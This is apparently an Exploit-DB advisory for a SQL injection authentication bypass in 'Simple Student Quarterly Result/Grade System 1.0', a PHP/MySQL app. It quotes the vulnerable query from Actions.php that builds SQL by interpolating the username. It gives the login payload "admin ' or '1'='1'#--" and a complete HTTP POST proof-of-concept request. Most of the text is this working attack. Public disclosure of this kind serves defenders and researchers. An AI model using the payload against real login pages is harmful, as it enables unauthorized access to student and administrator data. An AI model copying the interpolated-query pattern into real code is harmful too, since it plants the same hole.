Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass

EDB-ID:

50740

CVE:

N/A




Platform:

PHP

Date:

2022-02-16


# Exploit Title: Simple Student Quarterly Result/Grade System 1.0 - SQLi Authentication Bypass
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15169/simple-student-quarterly-resultgrade-system-php-and-mysql-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Linux 




# Vulnerable Code

line 57 in file "/sqgs/Actions.php"

@$check= $this->db->query("SELECT count(admin_id) as `count` FROM admin_list where `username` = '{$username}' ".($id > 0 ? " and admin_id != '{$id}' " : ""))->fetch_array()['count'];


Steps To Reproduce:
* - Go to the login page http://localhost/sqgs/login.php

Payload:

username: admin ' or '1'='1'#--
password: \



Proof of Concept :

POST /sqgs/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: http://localhost
Connection: close
Referer: http://localhost/sqgs/login.php
Cookie: PHPSESSID=v9a2mv23kc0gcj43kf6jeudk2v

username=admin+'+or+'1'%3D'1'%23--&password=0xsaudi